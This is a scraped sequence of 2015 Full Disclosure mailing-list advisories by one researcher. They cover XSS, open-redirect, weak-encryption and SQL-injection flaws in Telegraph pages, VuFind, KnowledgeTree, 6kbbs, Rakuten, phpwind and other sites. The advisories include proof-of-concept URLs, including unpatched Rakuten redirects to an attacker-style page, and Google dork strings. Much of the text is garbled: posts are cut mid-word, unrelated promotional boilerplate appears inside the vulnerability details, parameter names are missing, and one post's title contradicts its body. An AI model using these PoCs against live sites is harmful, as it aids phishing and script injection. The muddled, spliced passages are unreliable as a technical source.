[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

2015-11-02 Thread Jing Wang
*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discoved and Disclosured By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "" as its parameter.
All its web pages use "" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095;>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162;>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280;>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790;>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278;>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7. The
bugs found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWSAP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day Bug Security Issue

2015-09-25 Thread Jing Wang
*VuFind 1.0 **Web Application **Reflected XSS (Cross-site Scripting) 0-Day
Bug Security Issue*



Exploit Title: VuFind Results?  parameter Reflected XSS Web
Security Vulnerability
Product: VuFind
Vendor: VuFind
Vulnerable Versions: 1.0
Tested Version: 1.0
Advisory Publication: September 20, 2015
Latest Update: September 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
VuFind



*Product & Vulnerable Versions:*
VuFind
1.0



*Vendor URL & Download:*
Product can be obtained from here,
http://sourceforge.net/p/vufind/news/




*Product Introduction Overview:*
"VuFind is a library resource portal designed and developed for libraries
by libraries. The goal of VuFind is to enable your users to search and
browse through all of your library's resources by replacing the traditional
OPAC to include: Catalog Records, Locally Cached Journals, Digital Library
Items, Institutional Repository, Institutional Bibliography, Other Library
Collections and Resources. VuFind is completely modular so you can
implement just the basic system, or all of the components. And since it's
open source, you can modify the modules to best fit your need or you can
add new modules to extend your resource offerings. VuFind runs on Solr
Energy. Apache Solr, an open source search engine, offers amazing
performance and scalability to allow for VuFind to respond to search
queries in milliseconds time. It has the ability to be distributed if you
need to spread the load of the catalog over many servers or in a server
farm environment. VuFind is offered for free through the GPL open source
license. This means that you can use the software for free. You can modify
the software and share your successes with the community! Take a look at
our VuFind Installations Wiki page to see how a variety of organizations
have taken advantage of VuFind's flexibility. If you are already using
VuFind, feel free to edit the page and share your accomplishments. "






*(2) Vulnerability Details:*
VuFind web application has a computer security problem. Hackers can exploit
it by reflected XSS cyber attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug researchers before. VuFind has patched some of them. "scip
AG was founded in 2002. We are driven by innovation, sustainability,
transparency, and enjoyment of our work. We are completely self-funded and
are thus in the comfortable position to provide completely independent and
neutral services. Our staff consists of highly specialized experts who
focus on the topic information security and continuously further their
expertise through advanced training".


*(2.1)* The code flaw occurs at "lookfor?" parameter in
"/vufind/Resource/Results?" page.

Some other researcher has reported a similar vulnerability here and VuFind
has patched it.
https://vufind.org/jira/si/jira.issueviews:issue-html/VUFIND-54/VUFIND-54.html







*(3) Solution:*
Update to new version.









*References:*
http://tetraph.com/security/xss-vulnerability/vufind-xss/
http://securityrelated.blogspot.com/2015/09/vufind-xss.html
https://vulnerabilitypost.wordpress.com/2015/09/22/vufind-xss/
http://tetraph.blog.163.com/blog/static/234603051201582525130175/
https://packetstormsecurity.com/files/133374/Winmail-Server-4.2-Cross-Site-Scripting.html
http://marc.info/?l=oss-security=144094021709472=4
http://lists.openwall.net/full-disclosure/2015/08/31/2
http://ithut.tumblr.com/post/128012509383/webcabinet-winmail-server-42-reflected-xss
http://seclists.org/fulldisclosure/2015/Aug/84
http://lists.openwall.net/full-disclosure/2015/08/31/2







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

2015-08-30 Thread Jing Wang
*KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web
Application 0-Day Security Bug*



Exploit Title: KnowledgeTree login.php errorMessage parameter Reflected
XSS Web Security Vulnerability
Product: Knowledge Tree Document Management System
Vendor: Knowledge Inc
Vulnerable Versions: OSS 3.0.3b
Tested Version: OSS 3.0.3b
Advisory Publication: August 22, 2015
Latest Update: August 31, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)









*Suggestion Details:*


*(1) Vendor  Product Description:*


*Vendor:*
KnowledgeTree



*Product  Vulnerable Versions:*
Knowledge Tree Document Management System
OSS 3.0.3b



*Vendor URL  Download:*
Product can be obtained from here,
http://download.cnet.com/KnowledgeTree-Document-Management-System/3000-10743_4-10632972.html
http://www.knowledgetree.com/




*Product Introduction Overview:*
KnowledgeTree is open source document management software designed for
business people to use and install. Seamlessly connect people, ideas, and
processes to satisfy all your collaboration, compliance, and business
process requirements. KnowledgeTree works with Microsoft® Office®,
Microsoft® Windows® and Linux®.







*(2) Vulnerability Details:*
KnowledgeTree web application has a computer security problem. Hackers can
exploit it by reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. KnowledgeTree has patched some of
them. Bugtraq is an electronic mailing list dedicated to issues about
computer security. On-topic issues are new discussions about
vulnerabilities, vendor security-related announcements, methods of
exploitation, and how to fix them. It is a high-volume mailing list, and
almost all new vulnerabilities are discussed there.. It has listed similar
exploits, such as Bugtraq (Security Focus) 32920.



*(2.1) *The code flaw occurs at errorMessage parameter in login.php
page.

One similar bug is CVE-2008-5858. Its X-Force ID is 47529.








*References:*
http://tetraph.com/security/xss-vulnerability/knowledgetree-oss-3-0-3b-reflected-xss/
http://securityrelated.blogspot.com/2015/08/knowledgetree-oss-303b-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/31
https://progressive-comp.com/?l=full-disclosurem=143110966112898w=1
https://packetstormsecurity.com/files/132927/PhotoPost-PHP-4.8c-Cross-Site-Scripting.html
http://whitehatpost.blog.163.com/blog/static/242232054201573084141976/
https://hackertopic.wordpress.com/2015/08/22/knowledgetree-oss-3-0-3b-reflected-xss/
http://lists.openwall.net/full-disclosure/2015/03/10/5
http://marc.info/?l=full-disclosurem=143251239323317w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01415.html








--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] PhotoPost PHP 4.8c Cookie Based Stored XSS (Cross-site Scripting) Web Application 0-Day Bug

2015-08-01 Thread Jing Wang
://www.photopost.com/photopost/adm-index.php
)









*References:*
http://tetraph.com/security/xss-vulnerability/photopost-php/
http://securityrelated.blogspot.com/2015/07/photopost-php-48c-cookie-based-stored.html
https://progressive-comp.com/?l=full-disclosurem=142649827629327w=1
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01901.html
https://vulnerabilitypost.wordpress.com/2015/07/27/photopost-php/
http://tetraph.blog.163.com/blog/static/234603051201563055350773/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1817
http://www.inzeed.com/kaleidoscope/xss-vulnerability/rakuten-website-xss/
http://seclists.org/fulldisclosure/2015/Mar/56
http://lists.openwall.net/full-disclosure/2015/03/07/4







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

2015-06-11 Thread Jing Wang
*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)






*Recommendation Details:*


*(1) Vendor  Product Description:*


Vendor:
6kbbs



*Product  Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL  download:*
6kbbs can be gain from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions. Forum Technical realization (a) interface : using XHTML + CSS
structure, so the structure of the page , easy to modify the interface ;
save the transmission static page code , greatly reducing the amount of
data transmitted over the network ; improve the interface scalability ,
more in line with WEB standards, support Internet Explorer, FireFox, Opera
and other major browsers. (b) Program : The ASP + ACCESS mature technology
, the installation process is extremely simple , the environment is also
very common.


(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b)
Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the
latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent
community forum process . The program is simple but not simple ; fast ,
small ; interface generous and good scalability ; functional and practical
. pursue superiority , good interface , practical functions of choice for
subscribers.





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 6kbbs products 0-day web cyber bugs have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
A great many of the web securities have been published here.




Source Code:
?php
if(empty($row)){
$extrow=$db-row_select_one(users,username='{$username}');
if(!empty($extrow)  !empty($extrow['salt'])){

if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){
$row=$extrow;
$new_row[userpass]=$userpass_encrypt;
$new_row[salt]=;

$db-row_update(users,$new_row,id={$extrow['id']});
}
}
}
?



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that userpass stored in cookie was encrypted using $userpass
user password directly. And there is no HttpOnly attribute at all. Since
md5 is used for the encryption, it is easy for hackers to break the
encrypted message.


The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a by attribution
RSA license. (Wikipedia)








*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/

[FD] FC2 Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

2015-06-11 Thread Jing Wang
, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
A great many of the fllowing web securities have been published here,
Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL
injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated
Redirects and Forwards, Information Leakage, Denial of Service, File
Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML
Injection, Spam.


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox
(37.0.2)  Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2),Apple
Safari 6.1.6 of Mac OS X v10.9 Mavericks.


Since know only a little Japanese, not sure whether Rakuten pays much
attention to Open Redirect Vulnerabilities or not.





*(2.2.2)* Use one of webpages for the following tests. The webpage address
is http://www.inzeed.com/kaleidoscope/;. Can suppose that this webpage is
malicious.



Vulnerable URL 1:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=https://www.netflix.com/movies/

POC Code:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 2:
http://affiliate.rakuten.com/fs-bin/click?u1=no_referid=Jv*v1/Wldzgsubid=0offerid=229300.1type=10tmpid=6933RD_PARM1=http%3A%2F%2Fadcash.com%2fmoney

POC Code:
http://affiliate.rakuten.com/fs-bin/click?u1=no_referid=Jv*v1/Wldzgsubid=0offerid=229300.1type=10tmpid=6933RD_PARM1=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 3:
http://clickfrom.rakuten.com/default.asp?adid=17379sURL=http%3A%2F%2Fwww.craigslist.org

POC Code:
http://clickfrom.rakuten.com/default.asp?sURL=http://www.inzeed.com/kaleidoscope/






*Poc Video:*
https://www.youtube.com/watch?v=uxsuLgAdpCw


*Blog Detail:*
http://tetraph.com/security/open-redirect/rakuten-open-redirect/
http://securityrelated.blogspot.com/2015/06/rakuten-open-redirect.html





*(2.2.3) Vulnerability Disclosure:*
Those vulnerabilities are not patched now.








*More Details:*
http://tetraph.com/security/web-security/fc2-rakuten-xss-and-url-redirection/
http://securityrelated.blogspot.com/2015/06/fc2-rakuten-online-websites-multiple.html






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*Gcon Tech Solutions v1.0 XSS (Cross-site Scripting) Web Security
Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? id Parameter XSS
Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 23, 2015
Latest Update: May 23, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences, Nanyang Technological University (NTU), Singapore] (@justqdjing)




*Recommendation Details:*


*(1) Vendor  Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product  Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL  Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
Developed and maintained by Gcon Tech Solutions



*Product Introduction Overview:*
Over the years we have developed business domain knowledge various
business areas. We provide Development Services either on time and material
or turn-key fixed prices basis, depending on the nature of the project.
Application Development Services offered by Gcon Tech Solutions help
streamline business processes, systems and information. Gcon Tech Solutions
has a well-defined and mature application development process, which
comprises the complete System Development Life Cycle (SDLC) from defining
the technology strategy formulation to deploying, production operations and
support. We fulfill our client's requirement firstly from our existing
database of highly skilled professionals or by recruiting the finest
candidates locally. We analyze your business requirements and taking into
account any constraints and preferred development tools, prepare a fixed
price quote. This offers our customers a guaranteed price who have a single
point contact for easy administration. We adopt Rapid Application
Development technique where possible for a speedy delivery of the
Solutions. Salient Features of Gcon Tech Solutions Application Development
Services: (a) Flexible and Customizable. (b) Industry driven best
practices. (c) Knowledgebase and reusable components repository. (d) Ensure
process integration with customers at project initiation




*(2) Vulnerability Details:*
Gcon Tech Solutions web application has a computer cyber security bug
problem. It can be exploited by XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Gcon Tech Solutions has patched
some of them. The Mail Archive automatically detects when it receives mail
from a new list. Thus, you are encouraged, although certainly not required,
to send a test message to the newly archived list. If you are adding
several lists to the archive, send a separate and distinct test message to
each one. It also publishes suggestions, advisories, solutions details
related to XSS vulnerabilities and cyber intelligence recommendations.


*(2.1) *The first programming code flaw occurs at id parameter in
content.php? page.








*References:*
http://www.tetraph.com/security/xss-vulnerability/gcon-tech-solutions-v1-0-xss/
http://securityrelated.blogspot.com/2015/05/gcon-tech-solutions-v10-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/gcon-tech-solutions-v1-0-xss/
https://webtechwire.wordpress.com/2015/05/23/gcon-tech-solutions-v1-0-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154245138791/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg02028.html
http://seclists.org/fulldisclosure/2015/May/34
https://www.bugscan.net/#!/x/21839
http://lists.openwall.net/full-disclosure/2015/04/05/8
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1957





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] phpwind v8.7 Unvalidated Redirects and Forwards Web Security Vulnerabilities

2015-05-24 Thread Jing Wang
*phpwind v8.7 Unvalidated Redirects and Forwards Web Security
Vulnerabilities*



Exploit Title: phpwind v8.7 goto.php? url Parameter Open Redirect Security
Vulnerabilities
Product: phpwind
Vendor: phpwind
Vulnerable Versions: v8.7
Tested Version: v8.7
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)





*Caution Details:*


*(1) Vendor  Product Description:*


*Vendor:*
phpwind



*Product  Vulnerable Versions:*
phpwind
v8.7



*Vendor URL  Download:*
Product can be obtained from here,
http://www.phpwind.net/thread/166





*Product Introduction Overview:*
Today, the country's 200,000 worth of small sites, there are nearly
100,000 community site uses phpwind, has accumulated more than one million
sites use phpwind, there are 1,000 new sites every day use phpwind. These
community sites covering 52 types of trades every day one million people
gathered in phpwind build community, issued 50 million new information,
visit more than one billion pages. National Day PV30 million or more in
1000 about a large community, there are more than 500 sites selected
phpwind station software provided, including by scouring link Amoy
satisfaction, a daily e-commerce and marketing groups, and other on-line
product vigorously increase in revenue for the site. Excellent partners,
such as Xiamen fish, of Long Lane, Erquan network, Kunshan forum, the North
Sea 360, Huizhou West Lake, Huashang like.

phpwind recent focus on strengthening community media value, expand
e-commerce applications community. phpwind focus on small sites to explore
the value of integration and applications, we believe that the website that
is community, the community can provide a wealth of applications to meet
people access to information, communication, entertainment, consumer and
other living needs, gain a sense of belonging, become online home . With
the development of the Internet, in the form of the site will be more
abundant, the integration of the Forum, more forms of information portals,
social networking sites, we will integrate these applications to products
which, and to create the most optimized user experience. phpwind mission is
to make the community more valuable, so that more people enjoy the
convenience of the Internet community in order to enhance the quality of
life.





*(2) Vulnerability Details:*
phpwind web application has a computer cyber security bug problem. It can
be exploited by Unvalidated Redirects and Forwards (URL Redirection)
attacks. This could allow a user to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site to
an arbitrary web site of the attacker's choosing. Such attacks are useful
as the crafted URL initially appear to be a web page of a trusted site.
This could be leveraged to direct an unsuspecting user to a web page
containing attacks that target client side software such as a web browser
or document rendering programs.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. phpwind has patched some of them.
The Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
It also publishes suggestions, advisories, solutions details related to
Open Redirect vulnerabilities and cyber intelligence recommendations.


*(2.1) *The first programming code flaw occurs at url parameter in
/goto.php? page.





*References:*
http://www.tetraph.com/security/open-redirect/phpwind-v8-7-open-redirect/
http://securityrelated.blogspot.com/2015/05/phpwind-v87-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/phpwind-v8-7-open-redirect/
https://webtechwire.wordpress.com/2015/05/24/phpwind-v8-7-open-redirect-2/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01741.html
http://whitehatpost.blog.163.com/blog/static/242232054201542495731506/
http://cxsecurity.com/issue/WLB-2015030028
http://permalink.gmane.org/gmane.comp.security.oss.general/16883
http://lists.openwall.net/full-disclosure/2015/04/15/1
http://seclists.org/fulldisclosure/2015/Apr/35





--
Jing Wang

[FD] MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security Vulnerabilities

2015-05-08 Thread Jing Wang
*MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection Web Security
Vulnerabilities*


Exploit Title: MT.VERNON MEDIA Web-Design v1.12 Multiple SQL Injection
Security Vulnerabilities
Product: Web-Design
Vendor: MT.VERNON MEDIA
Vulnerable Versions: v1.12
Tested Version: v1.12
Advisory Publication: May 08, 2015
Latest Update: May 08, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore] (@justqdjing)



*Proposition Details:*


*(1) Vendor  Product Description:*


*Vendor:*
MT.VERNON MEDIA


*Product  Vulnerable Versions:*
Web-Design
v1.12



*Vendor URL  Download:*
MT.VERNON MEDIA can be obtained from here,
http://www.mtvernonmedia.com/services/WebDesign.html



*Google Dork:*
developed by: Mt. Vernon Media



*Product Introduction Overview:*
In today's economy every business is more focused on ROI (Return On
Investment) than ever before. We'll help you ensure a solid ROI for your
website, not only making it effective and easy to use for your clients, but
helping you to drive traffic to your site and ensuring effective content
and design to turn traffic into solid leads, sales, or repeat customers. We
offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet  Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads




*(2) Vulnerability Details:*
MT.VERNON MEDIA web application has a computer security bug problem. It can
be exploited by stored XSS attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other MT.VERNON MEDIA products 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. Openwall software releases and other related files
are also available from the Openwall file archive and its mirrors. You are
encouraged to use the mirrors, but be sure to verify the signatures on
software you download. The more experienced users and software developers
may use our CVSweb server to browse through the source code for most pieces
of Openwall software along with revision history information for each
source file. We publish articles, make presentations, and offer
professional services. Openwall has published suggestions, advisories,
solutions details related to SQL Injection vulnerabilities.


*(2.1) *The first programming code flaw occurs at section.php? page with
id parameter.

*(2.2) *The second programming code flaw occurs at illustrated_verse.php?
page with id parameter.

*(2.3) *The third programming code flaw occurs at image.php? page with
id parameter.






*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/mt-vernon-media-web-design-v1-12-multiple-sql-injection/
